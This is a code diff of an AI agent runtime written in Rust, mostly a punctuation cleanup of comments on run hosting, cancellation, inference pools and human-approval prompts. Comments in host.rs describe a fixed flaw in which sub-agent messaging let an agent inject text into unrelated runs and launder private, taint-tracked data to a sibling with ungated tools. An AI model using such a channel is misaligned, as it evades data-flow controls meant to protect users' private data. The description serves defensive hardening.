--- a/crates/leviath-runtime/src/host.rs
+++ b/crates/leviath-runtime/src/host.rs
@@ -1,16 +1,16 @@
 //! The world host: the daemon-side wrapper that owns a single [`PipelineWorld`],
 //! maps stable **run ids** to ECS entities, and interleaves external **control
-//! operations** with driving the world — all on one task, so there is never any
+//! operations** with driving the world - all on one task, so there is never any
 //! locking around the world.
 //!
-//! Clients (a control socket, the TUI, the CLI) don't hold entities — those are
+//! Clients (a control socket, the TUI, the CLI) don't hold entities - those are
 //! generational indices meaningful only inside the world. They address agents by
 //! run id. The host keeps the `run_id → Entity` map and turns each
 //! [`ControlOp`] into the corresponding [`PipelineWorld`] call, replying on the
 //! op's oneshot channel.
 //!
 //! The serve loop drives the world to quiescence, then parks until either an
-//! async result wakes it, a control op arrives, or shutdown is signalled —
+//! async result wakes it, a control op arrives, or shutdown is signalled -
 //! handling a control op and then re-driving to quiescence so its effect (a
 //! resume, a delivered message) is applied immediately.
 
@@ -30,8 +30,8 @@ use leviath_core::interaction::{InteractionRequest, InteractionResponse};
 use serde::{Deserialize, Serialize};
 
 /// The parameters for spawning an agent into the world. The runtime doesn't know
-/// how to load blueprints or resolve tools — that policy lives in the
-/// [`Spawner`] the daemon installs — so this just carries the raw request.
+/// how to load blueprints or resolve tools - that policy lives in the
+/// [`Spawner`] the daemon installs - so this just carries the raw request.
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Default)]
 pub struct SpawnArgs {
     /// The run id to give the new agent (its directory / control key).
@@ -95,7 +95,7 @@ pub type Spawner = Box<dyn FnMut(&mut PipelineWorld, &SpawnArgs) -> Result<Entit
 /// The daemon-installed function that pages a previously-unloaded run back into
 /// the world from its on-disk state: given a run id, it reloads the agent (its
 /// blueprint, tool state, context, stage) and returns the new entity, or `None`
-/// if there is no such resumable run on disk. Used for reload-on-demand — a
+/// if there is no such resumable run on disk. Used for reload-on-demand - a
 /// control/sub-agent op targeting a run that isn't currently in memory pages it
 /// in first via the host's internal resolve-or-reload step. Installed with
 /// [`WorldHost::set_reloader`].
@@ -106,8 +106,8 @@ pub type Reloader = Box<dyn FnMut(&mut PipelineWorld, &str) -> Option<Entity> + 
 /// and reports whether a run directory existed to act on.
 ///
 /// This is what makes a cancel unconditional. [`Reloader`] declines whenever a
-/// run can't be rebuilt — its blueprint was moved or deleted, its metadata is
-/// unreadable, it died mid-spawn before any agent existed — and before this seam
+/// run can't be rebuilt - its blueprint was moved or deleted, its metadata is
+/// unreadable, it died mid-spawn before any agent existed - and before this seam
 /// a cancel in that state replied `false` and wrote nothing, so `meta.json` kept
 /// claiming `running`/`starting` forever and the run could never be got rid of.
 /// The runtime has no notion of the on-disk layout, so the daemon supplies the
@@ -118,12 +118,12 @@ pub type ForceTerminator = Box<dyn FnMut(&str) -> bool + Send>;
 /// The daemon-installed hook run just before a terminal agent's entity is
 /// despawned (reaped). It receives the world and the entity while both are still
 /// valid, so the daemon can release per-agent resources the runtime doesn't know
-/// about — tearing down the agent's sandbox and dropping its tool state.
+/// about - tearing down the agent's sandbox and dropping its tool state.
 /// Installed with [`WorldHost::set_reaper`]; a no-op when none is set.
 pub type Reaper = Box<dyn FnMut(&mut PipelineWorld, Entity) + Send>;
 
 /// An async hook the host awaits *before* servicing a top-level `Spawn` control
-/// op, so the daemon can do async preparation the sync spawner can't — e.g.
+/// op, so the daemon can do async preparation the sync spawner can't - e.g.
 /// lazily connecting the blueprint's MCP servers into the shared pool (issue #97)
 /// so they're warm by the time [`Spawner`] reads them. The returned future is
 /// `'static` (it must clone anything it needs from the `SpawnArgs`). Installed
@@ -135,7 +135,7 @@ pub type SpawnPreprocessor = Box<
 
 /// A world-access request from an agent's tool lane. The sub-agent tools
 /// (`spawn_agent`/`check_agent`/`send_to_agent`/`kill_agent`) need the world and
-/// the [`Spawner`], which only the host holds — the tool lane runs async, off the
+/// the [`Spawner`], which only the host holds - the tool lane runs async, off the
 /// world. Each carries a oneshot reply, so the (sequential) tool lane blocks on
 /// the host applying it, mirroring the interaction hub.
 pub enum SubAgentOp {
@@ -165,7 +165,7 @@ pub enum SubAgentOp {
         /// The target run.
         run_id: String,
         /// The run doing the sending. The target must be it or one of its
-        /// descendants — see `WorldHost::is_within_tree`.
+        /// descendants - see `WorldHost::is_within_tree`.
         caller_run_id: String,
         /// The message body.
         content: String,
@@ -177,7 +177,7 @@ pub enum SubAgentOp {
         /// The run to cancel (with its descendants).
         run_id: String,
         /// The run doing the cancelling. The target must be it or one of its
-        /// descendants — see `WorldHost::is_within_tree`.
+        /// descendants - see `WorldHost::is_within_tree`.
         caller_run_id: String,
         /// Reply: whether anything was cancelled.
         reply: oneshot::Sender<bool>,
@@ -357,8 +357,8 @@ pub enum WorldEvent {
 }
 
 /// A world resource holding a clone of the host's [`WorldEvent`] broadcast
-/// sender, so ECS systems (e.g. the persistence drain) can push events — notably
-/// per-agent [`WorldEvent::Log`] lines — into the same stream the control
+/// sender, so ECS systems (e.g. the persistence drain) can push events - notably
+/// per-agent [`WorldEvent::Log`] lines - into the same stream the control
 /// transport serves. Absent in worlds that don't stream (test / `lev run`), where
 /// systems that depend on it become no-ops.
 // `Resource` moved from `bevy_ecs::system` to `bevy_ecs::resource` in 0.19.
@@ -418,12 +418,12 @@ impl WorldHost {
         Self::with_interactions(world, InteractionHub::new())
     }
 
-    /// Wrap a world with a specific interaction hub — the daemon shares one hub
+    /// Wrap a world with a specific interaction hub - the daemon shares one hub
     /// between the tool service's per-agent backends and this host.
     pub fn with_interactions(mut world: PipelineWorld, interactions: InteractionHub) -> Self {
         let (events, _) = broadcast::channel(1024);
-        // Let ECS systems (the persistence drain) push events — per-agent log
-        // lines — into the same stream the control transport serves.
+        // Let ECS systems (the persistence drain) push events - per-agent log
+        // lines - into the same stream the control transport serves.
         world
             .world_mut()
             .insert_resource(WorldEventSink(events.clone()));
@@ -599,9 +599,9 @@ impl WorldHost {
                 to_reap.push((run_id.clone(), entity));
             }
             // NOTE: non-terminal `Waiting` agents are intentionally NOT unloaded.
-            // Every `Waiting` state carries a live, unpersisted continuation — a
+            // Every `Waiting` state carries a live, unpersisted continuation - a
             // blocked `ask` future (`AwaitingInteraction`), running fan-out workers
-            // (`FanOutWaiting`), or pending children (`WaitingForChildren`) — so
+            // (`FanOutWaiting`), or pending children (`WaitingForChildren`) - so
             // flushing one to disk and paging it back cannot resume it (in-flight
             // interactions aren't persisted; the blocked future is gone). Only
             // terminal agents, whose full state is on disk, are safe to reap.
@@ -643,7 +643,7 @@ impl WorldHost {
     /// built straight into the world by the fan-out spawner, which has no handle
     /// on the host to register them. An unregistered agent is invisible to `list`
     /// (so `lev ps` never showed a worker), never reaped (its sandbox and tool
-    /// state leak), and — worst — un-cancellable, because a cancel by its run id
+    /// state leak), and - worst - un-cancellable, because a cancel by its run id
     /// misses the map, falls through to the reloader, and pages a **second** live
     /// entity in from that run's on-disk state while the original keeps running.
     /// Adopting them here is idempotent and keeps a stale mapping from winning:
@@ -861,7 +861,7 @@ impl WorldHost {
     /// had been unloaded. Returns whether the run was found in the world.
     ///
     /// Cancelling only the root would leave its sub-agents and fan-out workers
-    /// running — they are independent agents the schedule keeps driving, so they
+    /// running - they are independent agents the schedule keeps driving, so they
     /// would carry on spending tokens with no parent to report to. Each cancelled
     /// agent's open interactions are closed too, so nothing is left blocked on a
     /// prompt for a run that is going away.
@@ -869,7 +869,7 @@ impl WorldHost {
     ///
     /// `send_to_agent` and `kill_agent` took any run id at all. Nothing tied the
     /// target to the caller, so an agent could cancel an unrelated run, inject
-    /// text into its context, or — worst — hand it data: a message is added to
+    /// text into its context, or - worst - hand it data: a message is added to
     /// the target as `Public` regardless of the sender's taint, so an agent
     /// holding `Private` context whose own outbound tools were gated could pass
     /// it to a sibling whose tools were not. That is a laundering channel
@@ -919,7 +919,7 @@ impl WorldHost {
         }
         let mut cancelled = false;
         for e in subtree {
-            // Read the agent id before cancelling — the entity stays valid until
+            // Read the agent id before cancelling - the entity stays valid until
             // it is reaped, but reading first keeps this independent of that.
             let agent_id = self
                 .world
@@ -968,7 +968,7 @@ impl WorldHost {
                     // parsing a blueprint or building a sandbox would otherwise
                     // unwind the whole serve task and take the daemon with it.
                     // As with `run_isolated`, the world may be left holding a
-                    // partially-built entity — the run just never registers.
+                    // partially-built entity - the run just never registers.
                     Some(spawner) => {
                         match std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
                             spawner(&mut self.world, &args)
@@ -1019,7 +1019,7 @@ impl WorldHost {
                 // Cancel is unconditional: it either takes effect in the world
                 // (root plus every descendant) or, when the run can't be held
                 // there at all, is forced onto its on-disk state. It reports
-                // `false` only when there is genuinely no such run anywhere —
+                // `false` only when there is genuinely no such run anywhere -
                 // otherwise a run whose blueprint had moved stayed `running` on
                 // disk forever with no way to get rid of it.
                 let ok = self.cancel_tree(&run_id)
@@ -1079,7 +1079,7 @@ impl WorldHost {
 
     /// Run the host: drive the world to quiescence, then park until an async
     /// result wakes it, a control op arrives, or shutdown is signalled. Returns
-    /// when shutdown fires or the control channel closes — and before returning,
+    /// when shutdown fires or the control channel closes - and before returning,
     /// **flushes all queued persistence to disk** ([`Self::flush_and_stop`]) so a
     /// clean daemon shutdown never loses a dirty agent's final snapshot.
     pub async fn serve(&mut self, mut control_rx: UnboundedReceiver<ControlOp>) {
@@ -1455,7 +1455,7 @@ mod tests {
     #[tokio::test]
     async fn spawn_op_contains_a_panicking_spawner() {
         // A panic while building an agent (bad manifest, sandbox blow-up) must
-        // not unwind the daemon's serve task — the run just fails to start.
+        // not unwind the daemon's serve task - the run just fails to start.
         let mut host = host_with(vec![]);
         host.set_spawner(Box::new(|_world, _args| panic!("simulated spawn panic")));
         let (tx, rx) = oneshot::channel();
@@ -1632,7 +1632,7 @@ mod tests {
     }
 
     /// `send_to_agent` and `kill_agent` took any run id at all, so an agent
-    /// could reach into an unrelated run — cancel it, inject text, or hand it
+    /// could reach into an unrelated run - cancel it, inject text, or hand it
     /// data that arrives `Public` regardless of the sender's taint. That last
     /// one is a laundering channel straight through taint tracking.
     /// The converse of the refusal: a run the caller *did* spawn is reachable,
@@ -1684,7 +1684,7 @@ mod tests {
         .await;
         assert!(!killed, "nor ours to cancel");
 
-        // A run id that resolves to nothing at all is likewise not ours — the
+        // A run id that resolves to nothing at all is likewise not ours - the
         // walk never starts, rather than defaulting to reachable.
         let phantom = ask_sub(&mut host, |reply| SubAgentOp::Send {
             run_id: "no-such-run".to_string(),
@@ -1753,7 +1753,7 @@ mod tests {
         assert!(!miss);
     }
 
-    /// A user-facing cancel must reach the sub-agent tree, not just the root —
+    /// A user-facing cancel must reach the sub-agent tree, not just the root -
     /// otherwise the children keep running with nobody to report to. Before this,
     /// only the model-facing `kill_agent` tool cascaded.
     #[tokio::test]
@@ -1819,7 +1819,7 @@ mod tests {
     }
 
     /// Cancelling a run closes its open prompts. The blocked `ask` occupies a
-    /// tool-lane worker, and the lane has a fixed worker count — leaving it
+    /// tool-lane worker, and the lane has a fixed worker count - leaving it
     /// parked forever is what starves every other agent's tool batches.
     #[tokio::test]
     async fn cancel_closes_the_runs_open_interactions() {
@@ -1833,7 +1833,7 @@ mod tests {
                 .ask(InteractionRequest::free_text("q", "ask", "stage", true))
                 .await
         });
-        // Wait for the ask to register, then let the host emit it — so the
+        // Wait for the ask to register, then let the host emit it - so the
         // emitted-interaction set is non-empty and the cancel has something to
         // prune, rather than pruning an empty set.
         while hub.pending().is_empty() {
@@ -1874,7 +1874,7 @@ mod tests {
     #[tokio::test]
     async fn cancel_falls_back_to_the_force_terminator_when_the_world_cannot_hold_the_run() {
         let mut host = host_with(vec![]);
-        // A reloader that always declines — the deleted-blueprint case.
+        // A reloader that always declines - the deleted-blueprint case.
         host.set_reloader(Box::new(|_world, _run_id| None));
         let terminated = Arc::new(Mutex::new(Vec::new()));
         host.set_force_terminator(recording_terminator(terminated.clone()));
@@ -1929,7 +1929,7 @@ mod tests {
 
     /// Agents that enter the world outside a `Spawn` op (fan-out workers, built
     /// directly by the fan-out spawner) are adopted into the run-id map, so they
-    /// are listed, reaped and — the point here — cancellable by id. Left
+    /// are listed, reaped and - the point here - cancellable by id. Left
     /// unregistered, a cancel missed the map and paged a *second* copy of the run
     /// in from disk while the original kept going.
     #[tokio::test]
@@ -2500,7 +2500,7 @@ mod tests {
 
         let mut host = host_with(vec![]);
 
-        // Parked on a human prompt (`AwaitingInteraction`) — the reported bug:
+        // Parked on a human prompt (`AwaitingInteraction`) - the reported bug:
         // the blocked `ask` future is unpersisted, so unloading strands the run.
         let asking = register_waiting(&mut host, "asking");
         host.world
@@ -2515,7 +2515,7 @@ mod tests {
             .insert(WaitingForChildren);
         register_waiting(&mut host, "parked");
 
-        // Many serve passes — none of them may reap a Waiting agent.
+        // Many serve passes - none of them may reap a Waiting agent.
         for _ in 0..5 {
             host.emit_events();
         }

--- a/crates/leviath-runtime/src/inference_bridge.rs
+++ b/crates/leviath-runtime/src/inference_bridge.rs
@@ -1,4 +1,4 @@
-//! The async worker side of the ECS inference stage — the sync-ECS ↔ async-I/O
+//! The async worker side of the ECS inference stage - the sync-ECS ↔ async-I/O
 //! bridge for inference.
 //!
 //! Systems can't `.await`, and a single inference can take up to an hour, so the
@@ -11,7 +11,7 @@
 //!
 //! One task exists per *in-flight request* (bounded by the per-model
 //! [`InferencePools`](crate::inference_pool::InferencePools) permits), **never**
-//! one per agent — that is what keeps CPU bounded by work, not by agent count.
+//! one per agent - that is what keeps CPU bounded by work, not by agent count.
 
 use std::sync::Arc;
 use std::time::Duration;
@@ -80,7 +80,7 @@ pub struct InferenceJob {
     /// When set, count the assembled request's tokens exactly (via the
     /// provider's `count_tokens`, which uses a remote endpoint where available)
     /// before calling `infer`, and fail early if it would exceed the model's
-    /// context window. Off by default — the runtime's cheap `len/4` estimates
+    /// context window. Off by default - the runtime's cheap `len/4` estimates
     /// drive normal budgeting; this is the opt-in accurate guard.
     pub exact_token_counting: bool,
 }
@@ -170,8 +170,8 @@ pub async fn run_inference_job(
             }
         }
     };
-    // A cancel drops the whole retry-and-backoff future — aborting the in-flight
-    // HTTP request rather than waiting out the job timeout (up to 15 minutes) —
+    // A cancel drops the whole retry-and-backoff future - aborting the in-flight
+    // HTTP request rather than waiting out the job timeout (up to 15 minutes) -
     // and reports nothing: the agent is already terminal, so there is no outcome
     // to apply. Releasing the permit here is the point; a cancelled run used to
     // hold its model's pool slot for as long as the provider took to answer.
@@ -274,7 +274,7 @@ mod tests {
     }
 
     /// Cancelling releases the pool slot immediately instead of waiting out the
-    /// job timeout (15 minutes by default), and reports no outcome — the agent is
+    /// job timeout (15 minutes by default), and reports no outcome - the agent is
     /// already terminal, so there is nothing to apply.
     #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
     async fn a_cancelled_job_frees_its_pool_slot_without_reporting() {
@@ -284,7 +284,7 @@ mod tests {
         let permit = pools.try_acquire("m").expect("free pool");
         assert!(pools.try_acquire("m").is_none(), "pool should be full");
 
-        // A provider that never answers — the stalled-call case a cancel exists
+        // A provider that never answers - the stalled-call case a cancel exists
         // to escape.
         let provider = Arc::new(Scripted {
             steps: std::sync::Mutex::new(vec![Step::Hang].into()),
@@ -596,7 +596,7 @@ mod tests {
         Ok(String),
         Transient,
         Permanent,
-        /// Never returns — a stalled/hung call, for the job-timeout test.
+        /// Never returns - a stalled/hung call, for the job-timeout test.
         Hang,
     }
 

--- a/crates/leviath-runtime/src/inference_pool.rs
+++ b/crates/leviath-runtime/src/inference_pool.rs
@@ -1,7 +1,7 @@
 //! Per-model inference concurrency pools.
 //!
 //! A single [`InferencePools`] belongs to the world and bounds how many
-//! inference requests are in flight to each model at once — e.g. "at most 3
+//! inference requests are in flight to each model at once - e.g. "at most 3
 //! concurrent requests to `anthropic:claude-opus-4-8`", "at most 1 to a local
 //! `ollama:gemma`". This is the world-level control the ECS inference-dispatch
 //! system consults before issuing a request: an agent only leaves `ReadyToInfer`
@@ -9,7 +9,7 @@
 //! retried on a later tick (so "waiting for a slot" costs nothing but data).
 //!
 //! Why this matters: a single inference can take up to an hour for very large
-//! requests, so a permit may legitimately be held for a very long time — the
+//! requests, so a permit may legitimately be held for a very long time - the
 //! pool is what keeps us from opening an unbounded number of simultaneous
 //! long-lived requests to a provider.
 //!
@@ -22,7 +22,7 @@ use std::sync::{Arc, Mutex, PoisonError};
 
 use tokio::sync::{AcquireError, OwnedSemaphorePermit, Semaphore};
 
-/// How `tokio::sync::Semaphore` represents "effectively unbounded" — its own
+/// How `tokio::sync::Semaphore` represents "effectively unbounded" - its own
 /// maximum permit count. A model with no configured limit gets this many
 /// permits, so `acquire` never actually waits for it.
 const UNBOUNDED_PERMITS: usize = Semaphore::MAX_PERMITS;
@@ -81,7 +81,7 @@ impl InferencePools {
     }
 
     /// Acquire a permit for `model`, waiting for a free slot if the pool is
-    /// full. The returned [`InferencePermit`] releases the slot when dropped —
+    /// full. The returned [`InferencePermit`] releases the slot when dropped -
     /// so the caller holds it for exactly the duration of the inference request.
     pub async fn acquire(&self, model: &str) -> InferencePermit {
         let semaphore = self.semaphore_for(model);
@@ -101,7 +101,7 @@ impl InferencePools {
     pub fn try_acquire(&self, model: &str) -> Option<InferencePermit> {
         let semaphore = self.semaphore_for(model);
         // `try_acquire_owned` errors only on "no permits" (pool full) or
-        // "closed" (never, since we never close) — both mean "no slot now".
+        // "closed" (never, since we never close) - both mean "no slot now".
         match semaphore.try_acquire_owned() {
             Ok(permit) => Some(InferencePermit { _permit: permit }),
             Err(_) => None,
@@ -126,8 +126,8 @@ impl InferencePools {
 
 /// Unwrap an `acquire_owned` result, panicking with a clear message if the
 /// semaphore was closed. Extracted as a free function (rather than an inline
-/// `.expect(...)`) so both arms — the ordinary `Ok` and the never-in-practice
-/// `Err` — are exercised directly by unit tests, keeping the region covered.
+/// `.expect(...)`) so both arms - the ordinary `Ok` and the never-in-practice
+/// `Err` - are exercised directly by unit tests, keeping the region covered.
 fn expect_permit(result: Result<OwnedSemaphorePermit, AcquireError>) -> OwnedSemaphorePermit {
     result.expect("inference pool semaphore is never closed")
 }
@@ -161,9 +161,9 @@ mod tests {
     fn semaphore_for_is_cached_per_model() {
         let pools = InferencePools::new(InferencePoolConfig::new());
         let first = pools.semaphore_for("m");
-        let second = pools.semaphore_for("m"); // cache hit — same Arc
+        let second = pools.semaphore_for("m"); // cache hit - same Arc
         assert!(Arc::ptr_eq(&first, &second));
-        let other = pools.semaphore_for("n"); // cache miss — distinct Arc
+        let other = pools.semaphore_for("n"); // cache miss - distinct Arc
         assert!(!Arc::ptr_eq(&first, &other));
     }
 

--- a/crates/leviath-runtime/src/interaction_hub.rs
+++ b/crates/leviath-runtime/src/interaction_hub.rs
@@ -203,9 +203,10 @@ mod tests {
 
     #[test]
     fn a_poisoned_registry_still_serves_every_other_agent() {
-        // `pending` holds *every* agent's open prompt. A panic while holding it
-        // used to poison it, after which `pending()`/`answer()`/`cancel()`
-        // panicked for all agents and the dashboard (issue #109).
+        // `pending` holds *every* agent's open prompt, so a panic while holding
+        // it must not poison it: a poisoned registry makes
+        // `pending()`/`answer()`/`cancel()` panic for all agents and the
+        // dashboard (issue #109).
         let hub = InteractionHub::new();
         let prev = std::panic::take_hook();
         std::panic::set_hook(Box::new(|_| {})); // silence the deliberate panic

--- a/crates/leviath-runtime/src/interaction_hub.rs
+++ b/crates/leviath-runtime/src/interaction_hub.rs
@@ -1,4 +1,4 @@
-//! In-memory interaction hub — the shared-world replacement for the imperative
+//! In-memory interaction hub - the shared-world replacement for the imperative
 //! worker's `pending.json`/`response.json` file polling.
 //!
 //! When an agent's tool execution needs human input (an `ask_user_*` /
@@ -6,7 +6,7 @@
 //! [`HubInteractionBackend::ask`] registers the [`InteractionRequest`] with the
 //! [`InteractionHub`] and awaits a oneshot for the answer. The daemon surfaces
 //! open requests over the control channel via [`InteractionHub::pending`] and
-//! delivers answers with [`InteractionHub::answer`] — no filesystem, no polling.
+//! delivers answers with [`InteractionHub::answer`] - no filesystem, no polling.
 //!
 //! `ask` blocks the calling tool worker until the request is answered or
 //! cancelled; with the tool lane sequential today that serializes interactive
@@ -141,7 +141,7 @@ impl InteractionHub {
     /// closed. Each one's `submit` wakes with the neutral response.
     ///
     /// This is the per-agent counterpart of [`Self::cancel`], which is keyed by
-    /// request id — an id a canceller of a *run* doesn't have. Without it,
+    /// request id - an id a canceller of a *run* doesn't have. Without it,
     /// cancelling a run left its `ask` future blocked forever: the future holds a
     /// tool-lane worker (the lane has a fixed worker count, so enough of them
     /// stall every other agent's tool batches), and the orphaned request keeps
@@ -252,7 +252,7 @@ mod tests {
         let hub = InteractionHub::new();
         let wake = Arc::new(Notify::new());
         hub.attach_wake(wake.clone());
-        // A second attach is ignored — the handle is set once at startup.
+        // A second attach is ignored - the handle is set once at startup.
         hub.attach_wake(Arc::new(Notify::new()));
 
         let backend = hub.backend_for("agent-a");

--- a/crates/leviath-runtime/src/interaction_points.rs
+++ b/crates/leviath-runtime/src/interaction_points.rs
@@ -1,11 +1,11 @@
 //! Declarative stage-boundary interaction points (`StageMode::InteractivePoints`).
 //!
 //! Unlike the model-driven `ask_user_*` / `edit_document` tools (which fire only
-//! if the model chooses to call them — see [`crate::dynamic_interaction`]), an
+//! if the model chooses to call them - see [`crate::dynamic_interaction`]), an
 //! interaction point is declared statically in the blueprint and fired by the
 //! framework at the stage boundary, *always*, before the stage may transition.
 //! The canonical example is `plan_approval`: after the plan stage produces a
-//! plan, the user is shown a choice — approve / revise / edit / abort — and the
+//! plan, the user is shown a choice - approve / revise / edit / abort - and the
 //! answer deterministically routes what happens next.
 //!
 //! This is a first-class ECS lane, mirroring the transition-choice lane:
@@ -22,7 +22,7 @@
 //!   point. Directive/edit loops are bounded by [`MAX_REVISION_ROUNDS`].
 //!
 //! The routing is deterministic (code); only the input capture is a user
-//! interaction — faithfully porting the deleted imperative
+//! interaction - faithfully porting the deleted imperative
 //! `run_interactive_points_stage`.
 
 use std::collections::HashMap;
@@ -140,7 +140,7 @@ pub struct InteractionPointResults(pub UnboundedReceiver<InteractionPointOutcome
 // ─── Pure routing helpers (ported from the deleted imperative stage loop) ─────
 
 /// Normalize an option label for matching: fold Unicode dashes to ASCII `-` and
-/// collapse whitespace, so `"Revise — I'll…"` matches regardless of dash style.
+/// collapse whitespace, so `"Revise - I'll…"` matches regardless of dash style.
 fn normalize_for_followup(s: &str) -> String {
     s.chars()
         .map(|c| match c {
@@ -180,7 +180,7 @@ fn lookup_directive<'a>(
 }
 
 /// Build the interaction request for a point in its declared style, attaching
-/// `body` (the document the stage produced — e.g. the plan) so the client can
+/// `body` (the document the stage produced - e.g. the plan) so the client can
 /// show just this instance's document to review, rather than the full history.
 fn build_point_request(point: &InteractionPoint, id: String, body: &str) -> InteractionRequest {
     let mut req = match point.style {
@@ -281,7 +281,7 @@ async fn run_interaction_point(
         Routed::Edit { user_text } => {
             let edit_req = InteractionRequest::edit_text(
                 format!("{ask_id}-edit"),
-                "Edit the document — your changes replace it, then submit:",
+                "Edit the document - your changes replace it, then submit:",
                 &point.name,
                 body,
             );
@@ -295,7 +295,7 @@ async fn run_interaction_point(
 }
 
 /// Re-arm an agent that was blocked at an interaction point when the daemon stopped,
-/// bringing it back in the *waiting* state with the same open request — rather than
+/// bringing it back in the *waiting* state with the same open request - rather than
 /// the default `Active` + `ReadyToInfer` restore, which would re-issue inference and
 /// drop the prompt (issue #38).
 ///
@@ -312,7 +312,7 @@ async fn run_interaction_point(
 /// stage / the cursor is out of range (e.g. the blueprint changed under the run).
 pub fn restore_interaction_point(world: &mut World, entity: Entity, state: InteractionPointState) {
     // The lane + hub must both be wired (they are in the daemon; absent in a test
-    // world) — otherwise there is nothing to await the re-opened request.
+    // world) - otherwise there is nothing to await the re-opened request.
     let Some(((outcomes, wake, runtime), hub)) = world
         .get_resource::<InteractionPointStage>()
         .map(|s| (s.outcomes.clone(), s.wake.clone(), s.runtime.clone()))
@@ -457,7 +457,7 @@ pub fn dispatch_interaction_point(
     {
         crate::tick_scope::enter(entity);
         if state.status != AgentStatus::Active {
-            continue; // paused / cancelled — don't open a prompt
+            continue; // paused / cancelled - don't open a prompt
         }
         let idx = pc.map_or(0, |c| c.0);
         let point = stage_points(bp, cursor).and_then(|p| p.get(idx)).cloned();
@@ -476,14 +476,14 @@ pub fn dispatch_interaction_point(
             .map(|o| o.0.clone())
             .unwrap_or_else(|| infer.response.clone());
         // Make this the authoritative document in its pinned region (replacing
-        // any prior version), so revisions build on the current text — the
-        // user's edit included — rather than regenerating from the task. A
+        // any prior version), so revisions build on the current text - the
+        // user's edit included - rather than regenerating from the task. A
         // user edit is marked so the model preserves it deliberately.
         if let Some(region) = &point.document_region
             && !body.trim().is_empty()
         {
             let content = if user_revised {
-                format!("[revised by user — keep these changes]\n{body}")
+                format!("[revised by user - keep these changes]\n{body}")
             } else {
                 body.clone()
             };
@@ -531,7 +531,7 @@ pub fn dispatch_interaction_point(
     }
 }
 
-/// Collect: apply each resolved interaction-point outcome — approve advances
+/// Collect: apply each resolved interaction-point outcome - approve advances
 /// (or transitions when all points are done), abort cancels, a directive injects
 /// the directive and re-infers in-stage, an edit injects the edited text and
 /// re-presents; both revision paths are bounded by [`MAX_REVISION_ROUNDS`].
@@ -561,7 +561,7 @@ pub fn collect_interaction_point(
         };
         crate::tick_scope::enter(out.entity);
         // A run cancelled while its prompt was open is finished, and the arms
-        // below all set `Active`/`ResolveTransition` unconditionally — so without
+        // below all set `Active`/`ResolveTransition` unconditionally - so without
         // this, answering the orphaned prompt (from `lev respond`, the dashboard,
         // or the neutral response a cancel itself delivers) walked the run
         // straight back to `Active` and it carried on as if it had never been
@@ -604,7 +604,7 @@ pub fn collect_interaction_point(
                 // A model that has already concluded something tends to keep the
                 // conclusion and apply the correction only to the document. That
                 // happened: an agent that had created a file during discovery
-                // read it back while planning, decided "already created — no
+                // read it back while planning, decided "already created - no
                 // further action is needed", was told to use a different
                 // filename, updated the plan to say so, and still ended the run
                 // without renaming anything. The plan changed; its reading of
@@ -619,7 +619,7 @@ pub fn collect_interaction_point(
                         &name,
                         "",
                         "The plan above was revised before you approved it. Work from \
-                         the approved text as written — any conclusion you reached \
+                         the approved text as written - any conclusion you reached \
                          from the earlier version, including that something is \
                          already done, may no longer hold and should be re-checked \
                          against the plan rather than assumed.",
@@ -1328,8 +1328,8 @@ mod tests {
 
     /// Answering the prompt of a run that was cancelled while it waited must not
     /// bring the run back. Every non-`Abort` arm sets `Active` unconditionally, so
-    /// without the terminal guard an answer — including the neutral response a
-    /// cancel itself delivers to release the blocked `ask` — walked a cancelled
+    /// without the terminal guard an answer - including the neutral response a
+    /// cancel itself delivers to release the blocked `ask` - walked a cancelled
     /// run straight back into the pipeline.
     #[test]
     fn collect_does_not_resurrect_a_cancelled_run() {
@@ -1446,7 +1446,7 @@ mod tests {
 
     /// An approval that followed a revision has to say so. A model that had
     /// already concluded "this is done" kept the conclusion and applied the
-    /// correction only to the document — the plan changed, its reading of the
+    /// correction only to the document - the plan changed, its reading of the
     /// world did not. The note is only injected when there *was* a revision.
     #[test]
     fn collect_approve_after_a_revision_says_the_plan_changed() {

--- a/crates/leviath-runtime/src/interaction_points.rs
+++ b/crates/leviath-runtime/src/interaction_points.rs
@@ -80,7 +80,7 @@ pub struct PlanBodyOverride(pub String);
 
 /// Serializable snapshot of an agent parked at a stage-boundary interaction point,
 /// persisted to `<run_dir>/interactions.json` so a daemon restart can re-present the
-/// exact same prompt instead of dropping it and re-issuing inference (issue #38).
+/// exact same prompt instead of dropping it and re-issuing inference.
 /// Mirrors the fan-out sidecar (`fanout.json`). Everything needed to resume is small:
 /// the reviewed document lives here (and in a persisted context region), and the
 /// request id is derived from the agent id + point name + round.
@@ -297,7 +297,7 @@ async fn run_interaction_point(
 /// Re-arm an agent that was blocked at an interaction point when the daemon stopped,
 /// bringing it back in the *waiting* state with the same open request - rather than
 /// the default `Active` + `ReadyToInfer` restore, which would re-issue inference and
-/// drop the prompt (issue #38).
+/// drop the prompt.
 ///
 /// Looks up the point from the agent's (already-restored) blueprint + stage cursor,
 /// restores the point cursor/round, flips the agent to `Waiting` (clearing the

--- a/crates/leviath-runtime/src/persistence.rs
+++ b/crates/leviath-runtime/src/persistence.rs
@@ -1,7 +1,7 @@
 //! Agent-state persistence: turning a live ECS agent into the on-disk snapshot
 //! the dashboard/API read (`meta.json` + `context.json` under the run directory).
 //!
-//! This module holds the **pure** serialization core — components that carry an
+//! This module holds the **pure** serialization core - components that carry an
 //! agent's run identity and running token totals, plus functions that build the
 //! [`RunMeta`]/[`ContextSnapshot`] value types from an agent's live components.
 //! It does no I/O; the async write lane and the snapshot-dispatch system layer on
@@ -66,7 +66,7 @@ pub struct TokenTotals {
 
 /// Run-scoped productivity flags, mirrored into `meta.json` so an empty run can
 /// be recognized (and explained) from disk. Unlike [`StageProgress`], this is
-/// never reset on a stage transition — it describes the whole run.
+/// never reset on a stage transition - it describes the whole run.
 ///
 /// [`StageProgress`]: crate::pipeline::StageProgress
 #[derive(Component, Clone, Default, Debug, PartialEq)]
@@ -119,7 +119,7 @@ fn region_kind_str(kind: &RegionKind) -> &'static str {
 }
 
 /// Build the full context snapshot (`context.json`) from a window. Pure over the
-/// window — no engine/entity. (Ported from the CLI's `build_context_snapshot`.)
+/// window - no engine/entity. (Ported from the CLI's `build_context_snapshot`.)
 pub fn build_context_snapshot(window: &ContextWindow, stage_name: &str) -> ContextSnapshot {
     let regions = window
         .regions

--- a/crates/leviath-runtime/src/persistence_bridge.rs
+++ b/crates/leviath-runtime/src/persistence_bridge.rs
@@ -41,7 +41,7 @@ pub struct PersistJob {
